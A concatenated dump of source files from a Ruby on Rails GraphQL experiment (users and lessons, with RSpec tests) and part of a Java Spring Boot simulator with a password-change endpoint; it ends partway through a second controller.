name = 'Batman!'
let(:query) do
<<-GRAPHQL
mutation {
addUser(input: { name: "#{name}" }) {
user {
name,
}
}
}
GRAPHQL
end
it 'creates an user' do
response = client.execute(query)
user = response.data.add_user.user
expect(user.name).to eq(name)
end
end
<file_sep>class User < ApplicationRecord
has_many :lessons, :dependent => :destroy
validates :name, presence: true
end
<file_sep>class Users
def self.create!(name)
User.create!(name: name)
end
end
<file_sep>require 'rails_helper'
RSpec.describe User, type: :model do
# Relationships
it { should have_many :lessons }
# Attributes
it { should validate_presence_of :name }
end
<file_sep>class Mutations::AddLesson < Mutations::BaseMutation
argument :description, String, required: true
argument :user_id, ID, required: true
field :lesson, Types::LessonType, null: false
def resolve(description:, user_id:)
{
lesson: Lessons.create!(
description,
user_id,
)
}
end
end
<file_sep>class Types::LessonType < Types::BaseObject
field :id, ID, null: false
field :description, String, null: false
field :user_id, ID, null: false
field :user, Types::UserType, null: false
end
<file_sep>FactoryBot.define do
factory :user do
name 'cool name'
end
end
<file_sep>require 'rails_helper'
RSpec.describe Users, type: :service do
describe "#create!" do
it 'creates a valid User' do
name = 'a cool name'
user = Users.create!(name)
expect(user).to be_a User
end
end
end
<file_sep>require 'rails_helper'
describe 'Lesson Mutation', type: :request do
include_context 'GraphQL Client'
description = 'Turn the batsignal on!'
before do
create(:user)
end
let(:query) do
<<-GRAPHQL
mutation {
addLesson(input: { description: "#{description}", userId: #{User.first.id} }) {
lesson {
description,
user {
name
}
}
}
}
GRAPHQL
end
it 'creates a lesson' do
response = client.execute(query)
lesson = response.data.add_lesson.lesson
expect(lesson.description).to eq(description)
end
end
<file_sep>class Types::QueryType < Types::BaseObject
# Add root-level fields here.
# They will be entry points for queries on your schema.
field :lessons, [Types::LessonType], null: false
field :users, [Types::UserType], null: false
def lessons
Lesson.all
end
def users
User.all
end
end
<file_sep>class Types::UserType < Types::BaseObject
field :id, ID, null: false
field :name, String, null: false
field :lessons, [Types::LessonType], null: false
end
<file_sep>class Lessons
def self.create!(description, user_id)
Lesson.create!(
description: description,
user_id: user_id,
)
end
end
<file_sep>class Types::MutationType < Types::BaseObject
field :add_lesson, mutation: Mutations::AddLesson
field :add_user, mutation: Mutations::AddUser
end
<file_sep># README
[](https://circleci.com/gh/kaiomagalhaes/rails-graphql-experiment)
<file_sep># delete current records
User.destroy_all
10.times do
user = User.create!(name: Faker::FunnyName.name)
5.times do
Lesson.create!(description: BetterLorem.w, user: user)
end
end
<file_sep>class Mutations::AddUser < Mutations::BaseMutation
argument :name, String, required: true
field :user, Types::UserType, null: false
def resolve(name:)
{
user: Users.create!(name)
}
end
end
<file_sep>require 'rails_helper'
describe 'Lesson Query', type: :request do
include_context 'GraphQL Client'
let(:query) do
<<-GRAPHQL
query {
lessons {
description,
id,
user {
name
}
}
}
GRAPHQL
end
it 'returns a list of lessons' do
lessons_ids = create_list(:lesson, 2).map(&:id).map(&:to_s)
response = client.execute(query)
lessons = response.data.lessons
expect(lessons.map(&:id)).to contain_exactly(*lessons_ids)
end
end
<file_sep>require 'rails_helper'
RSpec.describe Lessons, type: :service do
describe "#create!" do
it 'creates a valid Lesson' do
description = 'a cool description'
user = create(:user)
lesson = Lessons.create!(description, user.id)
expect(lesson).to be_a(Lesson)
end
end
end
<file_sep>require 'graphlient'
RSpec.shared_context "GraphQL Client", shared_context: :metadata do
let(:client) do
Graphlient::Client.new('https://api.example.org/graphql') do |client|
client.http do |h|
h.connection do |c|
c.use Faraday::Adapter::Rack, app
end
end
end
end
end
<file_sep>require 'rails_helper'
RSpec.describe Lesson, type: :model do
# Relationships
it { should belong_to :user }
# Attributes
it { should validate_presence_of :description }
end
|
24df479c107b0d0bc8c98d083c3c7f718bdc2acf
|
[
"Markdown",
"Ruby"
] | 22 |
Ruby
|
kaiomagalhaes/rails-graphql-experiment
|
83e461a111a25ce7d1c5c82b03044714f1fedc17
|
416924d246929d38cd802e6d7c90d5a3127eb021
|
refs/heads/master
|
<repo_name>sumaq/apm-ws-client<file_sep>/src/com/aje/apm/webservices/WSRecuperarDatosClient.java
package com.aje.apm.webservices;
import java.rmi.RemoteException;
import org.apache.axis2.AxisFault;
import com.aje.apm.webservices.WSRecuperarDatosStub.Execute;
import com.aje.apm.webservices.WSRecuperarDatosStub.ExecuteResponse;
public class WSRecuperarDatosClient {
public static void main(String[] args) {
try {
String compania = args[0];
String tableName = args[1];
String wsName = args[2];
String wsParams = args[3];
String xmlRoot = args[4];
String xmlChild = args[5];
// Replace params char separator
wsParams = wsParams.replace("#", "&");
WSRecuperarDatosStub stub = new WSRecuperarDatosStub();
Execute execute = new Execute();
execute.setCompania(compania);
execute.setTableName(tableName);
execute.setWsName(wsName);
execute.setWsParams(wsParams);
execute.setXmlRoot(xmlRoot);
execute.setXmlChild(xmlChild);
ExecuteResponse response = stub.execute(execute);
System.out.println(response.get_return());
} catch (AxisFault e) {
System.out.println("Axis2 Error: " + e);
e.printStackTrace();
} catch (RemoteException e) {
System.out.println("Remote Error: " + e);
e.printStackTrace();
}
}
}
<file_sep>/README.md
apm-ws-client
==============
A java client for apm-ws web service.
<file_sep>/src/com/aje/apm/test/WSTest.java
package com.aje.apm.test;
import com.aje.apm.webservices.WSCargarDatosClient;
import com.aje.apm.webservices.WSRecuperarDatosClient;
public class WSTest {
public static void main(String[] args) {
// public static WSConnectString wsCon = new WSConnectString();
// wsCon.getServiceRecuperar()
WSRecuperarDatosClient wsRecuperar = new WSRecuperarDatosClient();
String[] paramsRecuperar = { "0004", "tmpAPMTurno2",
"verTurnosCerrados", "companiaID=0004#fecha=2014-10-23",
"turnos", "x" };
wsRecuperar.main(paramsRecuperar);
WSCargarDatosClient wsCargar = new WSCargarDatosClient();
String[] paramsCarga = { "0004",
"USP_APM_SQL_LISTA_PRECIO_SUC '0004','0002'",
"cargarListaPrecioSucursal", "ListaPrecioSucursal",
"LP_SUCURSAL", "LP_SUCURSAL" };
// wsCargar.main(paramsCarga);
}
}
<file_sep>/src/com/aje/common/APMWSConnectString.java
/* Class    : APMWSConnectString
 * Author   : <NAME>
 * Revised  : 22/06/2013 12:45
 * Purpose  : Retrieves the connection string for the APM database.
 *            It is read from the config.xml file in the project's conf folder.
 * */
package com.aje.common;
import java.io.IOException;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.Attributes;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;
public class APMWSConnectString extends DefaultHandler {
String xmlFileName;
String tmpValue;
String WSName;
String WSUrlServiceRecuperar;
static String WSUrlServiceCargar;
String WSUser;
String WSPassword;
OperatingSystem OS = new OperatingSystem();
Boolean fName;
Boolean fUrlServiceRecuperar;
Boolean fUrlServiceCargar;
Boolean fUser;
Boolean fPassword;
public APMWSConnectString() {
ResourcePath resource = new ResourcePath(this);
// Get the config file from the project's Build or WEB-INF folder
this.xmlFileName = resource.getWEBINFpath() + OS.getOSPathDelimiter()
+ "conf" + OS.getOSPathDelimiter() + "APM_WSConfig.xml"; // Windows
parseDocument();
}
private void parseDocument() {
// parse
SAXParserFactory factory = SAXParserFactory.newInstance();
fName = false;
fUrlServiceRecuperar = false;
fUrlServiceCargar = false;
fUser = false;
fPassword = false;
try {
SAXParser parser = factory.newSAXParser();
parser.parse(this.xmlFileName, this);
} catch (ParserConfigurationException e) {
System.out.println("ParserConfig error: " + e.getMessage());
e.printStackTrace();
} catch (SAXException e) {
System.out.println("SAXException : xml not well formed | "
+ e.getMessage());
e.printStackTrace();
} catch (IOException e) {
System.out.println("IO Error: " + e.getMessage());
e.printStackTrace();
}
}
@Override
public void startElement(String s, String s1, String elementName,
Attributes attributes) throws SAXException {
if (elementName.equalsIgnoreCase("name")) {
fName = true;
}
if (elementName.equalsIgnoreCase("urlServiceRecuperar")) {
fUrlServiceRecuperar = true;
}
if (elementName.equalsIgnoreCase("urlServiceCargar")) {
fUrlServiceCargar = true;
}
if (elementName.equalsIgnoreCase("user")) {
fUser = true;
}
if (elementName.equalsIgnoreCase("password")) {
fPassword = true;
}
}
@Override
public void endElement(String s, String s1, String element)
throws SAXException {
// nothing to do when an element ends
}
@Override
public void characters(char[] ac, int i, int j) throws SAXException {
if (fName) {
this.setName(new String(ac, i, j));
fName = false;
}
if (fUrlServiceRecuperar) {
this.setUrlServiceRecuperar(new String(ac, i, j));
fUrlServiceRecuperar = false;
}
if (fUrlServiceCargar) {
this.setUrlServiceCargar(new String(ac, i, j));
fUrlServiceCargar = false;
}
if (fUser) {
this.setUser(new String(ac, i, j));
fUser = false;
}
if (fPassword) {
this.setPassword(new String(ac, i, j));
fPassword = false;
}
}
public String getName() {
return WSName;
}
public void setName(String name) {
this.WSName = name;
}
public String getServiceRecuperar() {
return WSUrlServiceRecuperar;
}
public void setUrlServiceRecuperar(String service) {
this.WSUrlServiceRecuperar = service;
}
public static String getServiceCargar() {
return WSUrlServiceCargar;
}
public void setUrlServiceCargar(String service) {
this.WSUrlServiceCargar = service;
}
public String getUser() {
return WSUser;
}
public void setUser(String dataBaseUser) {
this.WSUser = dataBaseUser;
}
public String getPassword() {
return WSPassword;
}
public void setPassword(String dataBasePassword) {
this.WSPassword = dataBasePassword;
}
}
<file_sep>/src/com/aje/apm/webservices/WSCargarDatosClient.java
package com.aje.apm.webservices;
import java.rmi.RemoteException;
import org.apache.axis2.AxisFault;
import com.aje.apm.webservices.WSCargarDatosStub.Execute;
import com.aje.apm.webservices.WSCargarDatosStub.ExecuteResponse;
public class WSCargarDatosClient {
public static void main(String[] args) {
try {
String compania = args[0];
String spName = args[1];
String wsName = args[2];
String wsNameParamList = args[3];
String xmlRoot = args[4];
String xmlElement = args[5];
WSCargarDatosStub stub = new WSCargarDatosStub();
Execute execute = new Execute();
execute.setCompania(compania);
execute.setSpName(spName);
execute.setWsName(wsName);
execute.setWsNameParamList(wsNameParamList);
execute.setXmlRoot(xmlRoot);
execute.setXmlElement(xmlElement);
ExecuteResponse response = stub.execute(execute);
System.out.println(response.get_return());
} catch (AxisFault e) {
System.out.println("Axis2 Error: " + e.getMessage());
e.printStackTrace();
} catch (RemoteException e) {
System.out.println("Remote Error: " + e.getMessage());
e.printStackTrace();
} catch (Exception e) {
System.out.println("General Error: " + e.getMessage());
e.printStackTrace();
}
}
}
|
4fd9e45438447c1051757a1ae3765c4c94ec7976
|
[
"Markdown",
"Java"
] | 5 |
Java
|
sumaq/apm-ws-client
|
27e3731069ea469c0b0713cb2496c59cbd5e8994
|
dc358b15227de59523fd8610ad1e071119962f16
|
refs/heads/master
|
<repo_name>xxrom/136_single_number<file_sep>/main.py
from typing import List
class Solution:
    def singleNumber(self, nums: List[int]) -> int:
        counts = {}  # avoid shadowing the built-in dict
        for value in nums:
            counts[value] = counts.get(value, 0) + 1
        for value, count in counts.items():
            if count == 1:
                return value
12c288ac93b704b4762932043d9423decb3e87e0
|
[
"Python"
] | 1 |
Python
|
xxrom/136_single_number
|
093df8781a32dc0e012e05d64d20069e64537847
|
d7d349c1467cc90331f5a4b52b36a72828b84e7d
|
refs/heads/master
|
<repo_name>ingfernandorojas/complete-crud<file_sep>/src/app/services/course.service.ts
import { Injectable } from '@angular/core';
// Firebase
import {
AngularFirestore,
AngularFirestoreCollection,
AngularFirestoreDocument
} from 'angularfire2/firestore';
// Interface
import { courseInterface } from 'src/app/models/courseInterface';
// Observable
import { Observable } from 'rxjs';
// Map
import { map } from 'rxjs/operators';
@Injectable({
providedIn: 'root'
})
export class CourseService {
courseCollection: AngularFirestoreCollection<courseInterface>;
courses: Observable<courseInterface[]>;
courseDoc: AngularFirestoreDocument<courseInterface>;
constructor(public afs: AngularFirestore) {
this.courseCollection = afs.collection<courseInterface>('courses', ref => ref.orderBy('date','desc'));
this.courses = this.courseCollection.snapshotChanges().pipe(
map(actions => actions.map(a => {
const data = a.payload.doc.data() as courseInterface;
const id = a.payload.doc.id;
return { id, ...data };
}))
);
}
getCourses(){
return this.courses;
}
addCourse(coursesInterface: courseInterface){
this.courseCollection.add(coursesInterface);
}
deleteCourse(course: courseInterface){
this.courseDoc = this.afs.doc(`courses/${course.id}`);
this.courseDoc.delete();
}
updateCourse(course: courseInterface){
this.courseDoc = this.afs.doc(`courses/${course.id}`);
this.courseDoc.update(course);
}
}
<file_sep>/src/app/components/add-course/add-course.component.ts
import { Component, OnInit } from '@angular/core';
// Service
import { CourseService } from 'src/app/services/course.service';
// Interface
import { courseInterface } from 'src/app/models/courseInterface';
// Form
import { NgForm } from '@angular/forms';
@Component({
selector: 'app-add-course',
templateUrl: './add-course.component.html',
styleUrls: ['./add-course.component.css']
})
export class AddCourseComponent implements OnInit {
course: courseInterface = {
name: '',
teacher: '',
price: '',
technology: '',
language: '',
date: 0,
description: ''
};
constructor(private courseService: CourseService) { }
ngOnInit() {
}
onSubmit(form: NgForm){
if(form.valid === true){
const dateNow = Date.now();
this.course.date = dateNow;
this.courseService.addCourse(this.course);
form.resetForm();
}
}
}
<file_sep>/src/app/models/courseInterface.ts
export interface courseInterface {
id?: string;
name?: string;
teacher?: string;
price?: string;
technology?: string;
date?: number;
description?: string;
language?: string;
}<file_sep>/src/app/components/courses/courses.component.ts
import { Component, OnInit } from '@angular/core';
// Interface
import { courseInterface } from 'src/app/models/courseInterface';
// Service
import { CourseService } from 'src/app/services/course.service';
@Component({
selector: 'app-courses',
templateUrl: './courses.component.html',
styleUrls: ['./courses.component.css']
})
export class CoursesComponent implements OnInit {
courseList: courseInterface[];
editState: boolean = false;
courseToEdit: courseInterface;
constructor(
private courseService: CourseService,
) { }
ngOnInit() {
this.courseService.getCourses().subscribe(courses => {
this.courseList = courses;
});
}
editCourse(course: courseInterface){
this.editState = true;
this.courseToEdit = course;
return false;
}
updateCourse(course: courseInterface){
this.courseService.updateCourse(course);
this.clearState();
}
deleteCourse(course: courseInterface){
this.courseService.deleteCourse(course);
this.clearState();
}
clearState(){
this.editState = false;
this.courseToEdit = null;
return false;
}
}<file_sep>/README.md
# Angular
This project was generated with [Angular CLI](https://github.com/angular/angular-cli) version 6.2.2.
## Create a project in Firebase
Then create a database named "courses"
Add the following fields:
```
date
description
language
name
price
teacher
technology
```
## Clone the project
``` git clone https://github.com/ingfernandorojas/complete-crud.git ```
## Edit complete-crud/src/environments/environment.ts
```
FirebaseConfig: {
apiKey: "********************************",
authDomain: "******************************",
databaseURL: "*****************************",
projectId: "********************",
storageBucket: "***************************",
messagingSenderId: "**********************"
}
```
## Install packages
Inside complete-crud/, run ```npm install```
## Open in the browser
``` ng serve -o ```
|
d122df4df94f6d4266e033d46129610ae075db3f
|
[
"Markdown",
"TypeScript"
] | 5 |
TypeScript
|
ingfernandorojas/complete-crud
|
8dbea735eda79dcb0636a97a23b994c8eef3209a
|
1fbd5d25d917622ad7056ab0e3e872c53684ebe7
|
refs/heads/master
|
<repo_name>codalogic/value_or<file_sep>/value_or_example.cpp
#include "annotate-lite.h"
using namespace annotate_lite;
#include "include/value_or/value_or.h"
using namespace valueor;
#pragma warning( disable:4996 )
#include <cstdio>
#include <fstream>
#include <optional>
void pointer_types()
{
Scenario( "Pointer Types" );
struct BadPointer1 {};
struct BadPointer2 {};
try
{
int i = 0;
int * p_i = value_or<BadPointer1>( &i );
Good( "Exception should not thrown" );
p_i = value_or<BadPointer2>( (int*)0 );
Bad( "Exception should have thrown" );
}
catch( const BadPointer1 & )
{
Bad( "Exception thrown" );
}
catch( const BadPointer2 & )
{
Good( "Exception thrown" );
}
}
void unknown_types()
{
Scenario( "Unknown Types" );
struct BadUnknown {};
try
{
float f = value_or<BadUnknown>( 1.0f );
Bad( "Exception should have thrown" );
}
catch( const BadUnknown & )
{
Good( "Exception thrown" );
}
}
namespace valueor {
template<>
struct value_or_validator< const std::ifstream & >
{
static bool is_valid( const std::ifstream & v ) { return v.is_open(); }
};
}
void fopen_file_types()
{
Scenario( "File Types - fopen" );
struct BadFile1 {};
struct BadFile2 {};
try
{
FILE * fin1 = value_or<BadFile1>( fopen( "value_or_example.cpp", "r" ) );
Good( "Exception not thrown" );
fclose( fin1 );
FILE * fin2 = value_or<BadFile2>( fopen( "Non-existent file", "r" ) );
Bad( "Exception should have thrown" );
}
catch( const BadFile1 & )
{
Bad( "Exception should have thrown" );
}
catch( const BadFile2 & )
{
Good( "Exception thrown" );
}
}
void fstream_file_types()
{
Scenario( "File Types - ifstream" );
struct BadFile1 {};
struct BadFile2 {};
try
{
std::ifstream fin1( "value_or_example.cpp" );
value_or<BadFile1>( fin1 );
Good( "Exception not thrown" );
std::ifstream fin2( "non-existent file" );
value_or<BadFile2>( fin2 );
Bad( "Exception should have thrown" );
}
catch( const BadFile1 & )
{
Bad( "Exception should have thrown" );
}
catch( const BadFile2 & )
{
Good( "Exception thrown" );
}
}
template< typename Texception >
class ifstream_or : public std::ifstream
{
public:
ifstream_or<Texception>( const char *_Filename,
ios_base::openmode _Mode = std::ios_base::in,
int _Prot = (int)std::ios_base::_Openprot )
:
std::ifstream( _Filename, _Mode, _Prot )
{
if( ! is_open() )
throw Texception();
}
};
void fstream_or_file_types()
{
Scenario( "File Types - ifstream_or" );
struct BadFile1 {};
struct BadFile2 {};
try
{
ifstream_or<BadFile1> fin1( "value_or_example.cpp" );
Good( "Exception not thrown" );
ifstream_or<BadFile2> fin2( "non-existent file" );
Bad( "Exception should have thrown" );
}
catch( const BadFile1 & )
{
Bad( "Exception should have thrown" );
}
catch( const BadFile2 & )
{
Good( "Exception thrown" );
}
}
namespace valueor {
template< typename T >
struct value_or_validator< const std::optional<T> & >
{
static bool is_valid( const std::optional<T> & v ) { return v.has_value(); }
};
}
void std_optional_types()
{
Scenario( "std::optional" );
struct BadOption1 {};
struct BadOption2 {};
try
{
auto optional1 = std::optional<int>( 1 );
int i1 = value_or<BadOption1>( optional1 );
Good( "Exception not thrown" );
auto optional2 = std::optional<int>();
int i2 = value_or<BadOption2>( optional2 );
Bad( "Exception should have thrown" );
}
catch( const BadOption1 & )
{
Bad( "Exception should have thrown" );
}
catch( const BadOption2 & )
{
Good( "Exception thrown" );
}
}
template< class T >
struct Fault { int error_code; }; // Fault might contain data relevant to the problem
void templated_throws()
{
Scenario( "Templated Throws" );
struct Pointer1 {}; // These route the error handling
struct Pointer2 {};
try
{
int i = 0;
int * p_i = value_or<Fault<Pointer1>>( &i );
Good( "Exception should not thrown" );
p_i = value_or<Fault<Pointer2>>( (int*)0 );
Bad( "Exception should have thrown" );
}
catch( const Fault<Pointer1> & )
{
Bad( "Exception thrown" );
}
catch( const Fault<Pointer2> & )
{
Good( "Exception thrown" );
}
}
int main()
{
pointer_types();
unknown_types();
fopen_file_types();
fstream_file_types();
fstream_or_file_types();
std_optional_types();
templated_throws();
}
<file_sep>/include/value_or/value_or.h
//----------------------------------------------------------------------------
// Licensed under the MIT/X11 license - https://opensource.org/licenses/MIT
//----
// Copyright (c) 2018, Codalogic Ltd (http://www.codalogic.com)
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the "Software"),
// to deal in the Software without restriction, including without limitation
// the rights to use, copy, modify, merge, publish, distribute, sublicense,
// and/or sell copies of the Software, and to permit persons to whom the
// Software is furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
// THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
// FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
// DEALINGS IN THE SOFTWARE.
//----------------------------------------------------------------------------
#ifndef CODALOGIC_VALUE_OR
#define CODALOGIC_VALUE_OR
#include <optional>
namespace valueor {
//----------------------------------------------------------------------------
// The default validators
//----------------------------------------------------------------------------
template< typename Tvalue >
struct value_or_validator
{
static bool is_valid( const Tvalue & v ) { return false; }
};
template< typename Tvalue >
struct value_or_validator< Tvalue * >
{
static bool is_valid( const Tvalue * const p_v ) { return p_v; }
};
//----------------------------------------------------------------------------
// The functions
//----------------------------------------------------------------------------
template < typename Texception, typename Tvalue >
const Tvalue & value_or( const Tvalue & v )
{
if( ! value_or_validator<const Tvalue &>::is_valid( v ) )
throw Texception();
return v;
}
template < typename Texception, typename Tvalue >
Tvalue & value_or( Tvalue & v )
{
if( ! value_or_validator<const Tvalue &>::is_valid( v ) )
throw Texception();
return v;
}
template < typename Texception, typename Tvalue >
const Tvalue * value_or( const Tvalue * p_v )
{
if( ! value_or_validator<const Tvalue *>::is_valid( p_v ) )
throw Texception();
return p_v;
}
template < typename Texception, typename Tvalue >
Tvalue * value_or( Tvalue * p_v )
{
if( ! value_or_validator<const Tvalue *>::is_valid( p_v ) )
throw Texception();
return p_v;
}
template < typename Texception, typename Tvalue >
const Tvalue & value_or( const std::optional<Tvalue> & v )
{
if( ! v.has_value() )
throw Texception();
return v.value();
}
template < typename Texception, typename Tvalue >
Tvalue & value_or( std::optional<Tvalue> & v )
{
if( ! v.has_value() )
throw Texception();
return v.value();
}
//template < typename Texception >
//int * value_or( int * p_v )
//{
// if( ! value_or_validator<int *>::is_valid( p_v ) )
// throw Texception();
// return p_v;
//}
} // End of namespace valueor
#endif // CODALOGIC_VALUE_OR
<file_sep>/README.md
# value_or
An experiment in combining error code returns with exceptions
|
1742f6abd2841e94e1558514742f49d08eee0fa9
|
[
"Markdown",
"C++"
] | 3 |
C++
|
codalogic/value_or
|
e248d4d1573f3f66b85780c3a1046431baa59ffb
|
56f8da6f70cb560a0c52d57104484f35e9a85fed
|
refs/heads/master
|
<repo_name>jsouza678/RecyclaJogo<file_sep>/app/src/main/java/souza/home/com/recyclajogo/GameAdapter.java
package souza.home.com.recyclajogo;
import android.support.v7.widget.RecyclerView;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import java.util.List;
/**
* Created by JoaoSouza on 25/01/19.
*/
public class GameAdapter extends RecyclerView.Adapter<GameAdapter.GameViewHolder> {
private List<Game> gamesList;
public GameAdapter(List<Game> gamesList){
this.gamesList = gamesList;
}
@Override
public GameViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
View itemView = LayoutInflater.from(parent.getContext())
.inflate(R.layout.game_item_row, parent, false);
return new GameViewHolder(itemView);
}
@Override
public void onBindViewHolder(GameViewHolder holder, int position) {
holder.id.setText(gamesList.get(position).getId());
holder.nome.setText(gamesList.get(position).getNome());
}
@Override
public int getItemCount() {
return gamesList.size();
}
public class GameViewHolder extends RecyclerView.ViewHolder{
private TextView id;
private TextView nome;
public GameViewHolder(View view){
super(view);
id = (TextView)view.findViewById(R.id.id);
nome = (TextView)view.findViewById(R.id.nome);
}
}
}
|
43d92aab57b93fc34265498efac7a0f7e8ec892b
|
[
"Java"
] | 1 |
Java
|
jsouza678/RecyclaJogo
|
dafb1a8a363bc4c60e872d4b992b0a8fbb11e1dd
|
bcadf4960a1fe2ab9fc52aa0811956c688471d05
|
refs/heads/master
|
<file_sep>package com.simulator.http.controller.update;
import java.text.SimpleDateFormat;
import java.util.Date;
import org.jboss.logging.Logger;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.validation.annotation.Validated;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseStatus;
import org.springframework.web.bind.annotation.RestController;
import com.simulator.common.CommonConst;
import com.simulator.common.CommonUtil;
import com.simulator.common.RSAEncryptor;
import com.simulator.dataservice.Service.LoginMngmtService;
import com.simulator.dataservice.entity.LoginMngmtEntity;
import com.simulator.telegram.if42.RequestTeleIF42Dto;
import com.simulator.telegram.if42.ResponseTeleIF41Dto;
@RestController
@RequestMapping()
@Validated
public class UpdateController {
private static final Logger log = Logger.getLogger(UpdateController.class);
@Autowired
private LoginMngmtService loginMngmtService;
/** Password update control flag: 1 = error */
private static String FAULT = "1";
/** Password update control flag: communication error 408 */
private static String STS_408 = "2";
/** Password update control flag: communication error 504 */
private static String STS_504 = "3";
/** Password update control flag: communication error 400 */
private static String STS_400 = "4";
@RequestMapping(value = CommonConst.UPDATE, method = {
RequestMethod.POST }, consumes = MediaType.APPLICATION_JSON_VALUE)
public String runUpdate(@Validated @RequestBody String strBody) {
log.info("パスワード変更処理を開始");
log.info("パスワード変更要求電文:" + strBody);
// Initialization
ResponseTeleIF41Dto if41Dto = new ResponseTeleIF41Dto();
String responseStr = "";
// Parse the received message
RequestTeleIF42Dto if42Dto = CommonUtil.jsonConvertObject(strBody, RequestTeleIF42Dto.class);
// If the received message fails to parse (null), return status code 400
if (if42Dto == null) {
throw new HttpStatus400Exception();
}
// Fetch the login user's record
LoginMngmtEntity loginInfo = loginMngmtService.findByPk(if42Dto.getTerminalLoginId());
// If no record was found for the login user ID
if (loginInfo == null) {
if41Dto.setResultCode(1);
if41Dto.setErrorCode("300001");
if41Dto.setErrorMessage("ご利用出来ないログインIDです。\nもう一度ご確認お願いします。");
} else {
// Read the password update processing control flag
String updateFlg = loginInfo.getUpdateControl();
if (STS_408.equals(updateFlg)) {
throw new HttpStatus408Exception();
} else if (STS_504.equals(updateFlg)) {
throw new HttpStatus504Exception();
} else if (STS_400.equals(updateFlg)) {
throw new HttpStatus400Exception();
} else {
// Determine whether the password may be changed
if (FAULT.equals(updateFlg)) {
if41Dto.setResultCode(1);
if41Dto.setErrorCode("300001");
if41Dto.setErrorMessage("本サービスはご利用頂けません。");
} else {
// Get the current password and the new password from the request
String requestPassword = if42Dto.getPassword();
String newPassword = if42Dto.getNewPassword();
/** ▼ Decrypt the received passwords ▼ **/
requestPassword = RSAEncryptor.decrypt(requestPassword);
newPassword = RSAEncryptor.decrypt(newPassword);
/** ▲ Decrypt the received passwords ▲ **/
// Get the stored login password
String password = loginInfo.getLoginPass();
// Current password check OK
if (password.equals(requestPassword)) {
if (password.equals(newPassword)) {
if41Dto.setResultCode(1);
if41Dto.setErrorCode("300003");
if41Dto.setErrorMessage("現在のパスワードと変更パスワードが同じです。");
} else {
/** ▼ Update the password ▼ **/
LoginMngmtEntity updateInfo = new LoginMngmtEntity();
updateInfo.setTerminalLoginId(if42Dto.getTerminalLoginId());
updateInfo.setLoginPass(newPassword);
loginMngmtService.updateLoginPassByPK(updateInfo);
/** ▲ Update the password ▲ **/
// Response telegram: result code = 0 (normal)
if41Dto.setResultCode(0);
}
// Current password check NG
} else {
if41Dto.setResultCode(1);
if41Dto.setErrorCode("300002");
if41Dto.setErrorMessage("ログインパスワードが間違いました。");
}
}
}
}
// Set the processing datetime on the response telegram
String time = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date());
if41Dto.setTime(time);
// Convert the response telegram to a JSON string
responseStr = CommonUtil.convertJson(if41Dto);
log.info("パスワード変更応答電文:" + responseStr);
log.info("パスワード変更処理を終了");
// Return the response telegram
return responseStr;
}
@ResponseStatus(value = HttpStatus.REQUEST_TIMEOUT)
private class HttpStatus408Exception extends RuntimeException {
private static final long serialVersionUID = 4622535996824077793L;
}
@ResponseStatus(value = HttpStatus.GATEWAY_TIMEOUT)
private class HttpStatus504Exception extends RuntimeException {
private static final long serialVersionUID = 1372311004528494096L;
}
@ResponseStatus(value = HttpStatus.BAD_REQUEST)
private class HttpStatus400Exception extends RuntimeException {
private static final long serialVersionUID = 2430747116965743847L;
}
@ResponseStatus(value = HttpStatus.INTERNAL_SERVER_ERROR)
private class HttpStatus500Exception extends RuntimeException {
private static final long serialVersionUID = -4041777557110386908L;
}
}
<file_sep>package com.simulator;
import org.mybatis.spring.annotation.MapperScan;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.web.servlet.ServletComponentScan;
import org.springframework.data.jpa.repository.config.EnableJpaRepositories;
@SpringBootApplication
@EnableJpaRepositories(basePackages = "com.simulator.dataservice.repository")
@ServletComponentScan
@MapperScan("com.simulator.dataservice")
public class SimulatorApplication {
public static void main(String[] args) {
SpringApplication.run(SimulatorApplication.class, args);
}
}
<file_sep>package com.simulator.http.controller.use;
import java.text.SimpleDateFormat;
import java.util.Date;
import org.jboss.logging.Logger;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.validation.annotation.Validated;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseStatus;
import org.springframework.web.bind.annotation.RestController;
import com.simulator.common.CommonConst;
import com.simulator.common.CommonUtil;
import com.simulator.dataservice.Service.CouponInfoService;
import com.simulator.dataservice.Service.LoginMngmtService;
import com.simulator.dataservice.Service.TradeInfoService;
import com.simulator.dataservice.Service.TradeSeqService;
import com.simulator.dataservice.entity.CouponInfoEntity;
import com.simulator.dataservice.entity.LoginMngmtEntity;
import com.simulator.dataservice.entity.TradeInfoEntity;
import com.simulator.telegram.if30.RequestTeleIF30Dto;
import com.simulator.telegram.if30.ResponseTeleIF29Dto;
import com.simulator.telegram.if30.TeleIF29DataDto;
@RestController
@RequestMapping()
@Validated
public class UseController {
private static final Logger log = Logger.getLogger(UseController.class);
@Autowired
private CouponInfoService couponInfoService;
@Autowired
private LoginMngmtService loginMngmtService;
@Autowired
